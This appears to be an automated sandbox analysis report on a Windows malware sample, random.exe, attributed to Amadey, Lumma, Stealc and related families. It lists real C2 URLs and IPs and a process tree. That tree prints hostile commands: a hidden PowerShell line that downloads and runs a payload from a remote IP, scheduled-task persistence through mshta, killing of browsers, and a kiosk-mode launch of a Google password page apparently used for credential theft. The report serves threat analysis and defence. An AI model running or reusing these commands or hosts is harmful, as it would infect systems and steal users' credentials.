Overview

overview

10

Static

static

3

random.exe

windows10-2004-x64

10

Resubmissions

16/03/2025, 14:27

250316-rslvgaszdx 10

16/03/2025, 08:13

250316-j4f5cswsfx 10

15/03/2025, 11:26

250315-njwrjawlt6 10

Analysis

  • max time kernel
    134s
  • max time network
    131s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/03/2025, 14:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    random.exe

  • Size

    5.6MB

  • MD5

    f0cad0627e4b852e7ce633df29855373

  • SHA1

    3187e3016d889fdcb5f3c38cc19c1dac27163fe4

  • SHA256

    e7b933849e850c1778c1378c7a5d07df318d86f7b3ee6257885b768fa81f685c

  • SHA512

    c121d9a4d2ced148ac422e193096e7596c8270c662065b9f16efe4ec4ccc1552b44ad92511246fdde7fed55fbb53c178a5da28a84533707a907084c25ad9c615

  • SSDEEP

    98304:6zd9u3jgDjebrGE5pd8PY22ImKYMFCqgupRERune9rmqy3kG/TQ8swX+hh/YG6GR:0dMgebrREbJPYIpKcneY13LTQf6+hVYM

Score
10/10
amadeygcleanerhealerlummastealc092155trumpcredential_accessdefense_evasiondiscoverydropperevasionexecutionloaderpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://citydisco.bet/api

https://crosshairc.life/api

https://mrodularmall.top/api

https://jowinjoinery.icu/api

https://legenassedk.top/api

https://4htardwarehu.icu/api

https://cjlaspcorne.icu/api

https://bugildbett.top/api

https://weaponrywo.digital/api

https://begindecafer.world/api

https://9garagedrootz.top/api

https://modelshiverd.icu/api

https://arisechairedd.shop/api

https://catterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://ksterpickced.digital/api

https://loadoutle.life/api

https://caliberc.today/api

https://pistolpra.bet/api

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 21 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 30 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 15 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 9 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 8 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops desktop.ini file(s) 3 IoCs
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 48 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 22 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 29 IoCs
  • Suspicious use of FindShellTrayWindow 60 IoCs
  • Suspicious use of SendNotifyMessage 26 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\random.exe
    "C:\Users\Admin\AppData\Local\Temp\random.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5176
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u0k28.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u0k28.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5480
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1u87m9.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1u87m9.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:5016
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1100
          • C:\Users\Admin\AppData\Local\Temp\10234320101\25d3381dc2.exe
            "C:\Users\Admin\AppData\Local\Temp\10234320101\25d3381dc2.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:3612
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c schtasks /create /tn NDWa3mahTSe /tr "mshta C:\Users\Admin\AppData\Local\Temp\HSKMXtqdM.hta" /sc minute /mo 25 /ru "Admin" /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3380
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn NDWa3mahTSe /tr "mshta C:\Users\Admin\AppData\Local\Temp\HSKMXtqdM.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:384
            • C:\Windows\SysWOW64\mshta.exe
              mshta C:\Users\Admin\AppData\Local\Temp\HSKMXtqdM.hta
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              PID:1832
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'C0EVVGUL1YFGFWVGDBJBRSQZOFRCYRVH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:316
                • C:\Users\Admin\AppData\Local\TempC0EVVGUL1YFGFWVGDBJBRSQZOFRCYRVH.EXE
                  "C:\Users\Admin\AppData\Local\TempC0EVVGUL1YFGFWVGDBJBRSQZOFRCYRVH.EXE"
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5400
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10234330121\am_no.cmd" "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2648
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 2
              6⤵
              • System Location Discovery: System Language Discovery
              • Delays execution with timeout.exe
              PID:4608
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:60
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4644
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2072
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2684
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:620
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5484
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn "l0jcrmau2S7" /tr "mshta \"C:\Temp\sJ4Le5E7b.hta\"" /sc minute /mo 25 /ru "Admin" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:4248
            • C:\Windows\SysWOW64\mshta.exe
              mshta "C:\Temp\sJ4Le5E7b.hta"
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              PID:540
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:532
                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1832
          • C:\Users\Admin\AppData\Local\Temp\10234600101\31dd5259a8.exe
            "C:\Users\Admin\AppData\Local\Temp\10234600101\31dd5259a8.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3024
          • C:\Users\Admin\AppData\Local\Temp\10234610101\6f05c7b067.exe
            "C:\Users\Admin\AppData\Local\Temp\10234610101\6f05c7b067.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1256
          • C:\Users\Admin\AppData\Local\Temp\10234620101\4cbbfa3df7.exe
            "C:\Users\Admin\AppData\Local\Temp\10234620101\4cbbfa3df7.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3800
          • C:\Users\Admin\AppData\Local\Temp\10234630101\258f4a1cc8.exe
            "C:\Users\Admin\AppData\Local\Temp\10234630101\258f4a1cc8.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:1980
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2620
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM chrome.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3860
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM msedge.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4276
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM opera.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:5124
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM brave.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:5496
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              6⤵
                PID:5524
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  7⤵
                  • Drops desktop.ini file(s)
                  • Checks processor information in registry
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of SetWindowsHookEx
                  PID:1632
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2056 -prefsLen 27099 -prefMapHandle 2060 -prefMapSize 270279 -ipcHandle 2132 -initialChannelId {81391639-d841-4b7e-a16c-b3ac0ffb0a32} -parentPid 1632 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1632" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                    8⤵
                      PID:2832
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2408 -prefsLen 27135 -prefMapHandle 2540 -prefMapSize 270279 -ipcHandle 2548 -initialChannelId {4e82a0c5-35d7-465b-b79d-8322e9ba11b6} -parentPid 1632 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1632" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                      8⤵
                        PID:1184
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3912 -prefsLen 25213 -prefMapHandle 3916 -prefMapSize 270279 -jsInitHandle 3920 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3872 -initialChannelId {82a5669b-da7d-4c23-aaf5-3bc75b34f594} -parentPid 1632 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1632" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                        8⤵
                        • Checks processor information in registry
                        PID:5376
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4068 -prefsLen 27325 -prefMapHandle 4072 -prefMapSize 270279 -ipcHandle 4160 -initialChannelId {544d18d8-39e2-4f01-bed2-94e05589a9e5} -parentPid 1632 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1632" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                        8⤵
                          PID:2672
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3264 -prefsLen 34824 -prefMapHandle 3268 -prefMapSize 270279 -jsInitHandle 3208 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2720 -initialChannelId {899f38c4-edff-4f3c-953d-19cca5ce4f70} -parentPid 1632 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1632" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                          8⤵
                          • Checks processor information in registry
                          PID:220
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5148 -prefsLen 34959 -prefMapHandle 5152 -prefMapSize 270279 -ipcHandle 5160 -initialChannelId {705a417f-ea3e-4763-be23-4441103459f0} -parentPid 1632 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1632" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                          8⤵
                          • Checks processor information in registry
                          PID:7024
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5632 -prefsLen 32952 -prefMapHandle 5636 -prefMapSize 270279 -jsInitHandle 5640 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5648 -initialChannelId {851445b0-054f-4309-9c66-9a5239634148} -parentPid 1632 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1632" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                          8⤵
                          • Checks processor information in registry
                          PID:4840
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5676 -prefsLen 32952 -prefMapHandle 5664 -prefMapSize 270279 -jsInitHandle 5764 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5840 -initialChannelId {50291cec-79e4-4584-967a-b6a31cf6ba73} -parentPid 1632 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1632" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                          8⤵
                          • Checks processor information in registry
                          PID:1924
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6012 -prefsLen 32952 -prefMapHandle 6016 -prefMapSize 270279 -jsInitHandle 6020 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6028 -initialChannelId {97fbff4d-3eb0-453d-b357-1e81851f181b} -parentPid 1632 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1632" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                          8⤵
                          • Checks processor information in registry
                          PID:4216
                  • C:\Users\Admin\AppData\Local\Temp\10234640101\8c58854a1d.exe
                    "C:\Users\Admin\AppData\Local\Temp\10234640101\8c58854a1d.exe"
                    5⤵
                    • Modifies Windows Defender DisableAntiSpyware settings
                    • Modifies Windows Defender Real-time Protection settings
                    • Modifies Windows Defender TamperProtection settings
                    • Modifies Windows Defender notification settings
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Windows security modification
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1200
                  • C:\Users\Admin\AppData\Local\Temp\10234650101\dd57be8f96.exe
                    "C:\Users\Admin\AppData\Local\Temp\10234650101\dd57be8f96.exe"
                    5⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4476
                  • C:\Users\Admin\AppData\Local\Temp\10234660101\5c131ccb58.exe
                    "C:\Users\Admin\AppData\Local\Temp\10234660101\5c131ccb58.exe"
                    5⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:6204
                    • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                      6⤵
                      • Downloads MZ/PE file
                      • System Location Discovery: System Language Discovery
                      PID:6860
                  • C:\Users\Admin\AppData\Local\Temp\10234670101\2f590e9b95.exe
                    "C:\Users\Admin\AppData\Local\Temp\10234670101\2f590e9b95.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    PID:6476
                    • C:\Users\Admin\AppData\Local\Temp\10234670101\2f590e9b95.exe
                      "C:\Users\Admin\AppData\Local\Temp\10234670101\2f590e9b95.exe"
                      6⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:6504
                  • C:\Users\Admin\AppData\Local\Temp\10234680101\zY9sqWs.exe
                    "C:\Users\Admin\AppData\Local\Temp\10234680101\zY9sqWs.exe"
                    5⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    PID:6652
                    • C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                      "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
                      6⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:6768
                  • C:\Users\Admin\AppData\Local\Temp\10234690101\HmngBpR.exe
                    "C:\Users\Admin\AppData\Local\Temp\10234690101\HmngBpR.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:3284
                    • C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
                      C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:4176
                      • C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
                        C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: MapViewOfSection
                        PID:5304
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\SysWOW64\cmd.exe
                          8⤵
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: MapViewOfSection
                          PID:1200
                          • C:\Windows\SysWOW64\explorer.exe
                            C:\Windows\SysWOW64\explorer.exe
                            9⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: AddClipboardFormatListener
                            • Suspicious use of SetWindowsHookEx
                            PID:4768
                  • C:\Users\Admin\AppData\Local\Temp\10234700101\FnJ67k2.exe
                    "C:\Users\Admin\AppData\Local\Temp\10234700101\FnJ67k2.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:6364
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      6⤵
                        PID:6420
                    • C:\Users\Admin\AppData\Local\Temp\10234710101\893c696bf6.exe
                      "C:\Users\Admin\AppData\Local\Temp\10234710101\893c696bf6.exe"
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:4920
                    • C:\Users\Admin\AppData\Local\Temp\10234720101\f5d33b950a.exe
                      "C:\Users\Admin\AppData\Local\Temp\10234720101\f5d33b950a.exe"
                      5⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      PID:7084
                • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2x8387.exe
                  C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2x8387.exe
                  3⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4600
              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3r19R.exe
                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3r19R.exe
                2⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Downloads MZ/PE file
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Loads dropped DLL
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
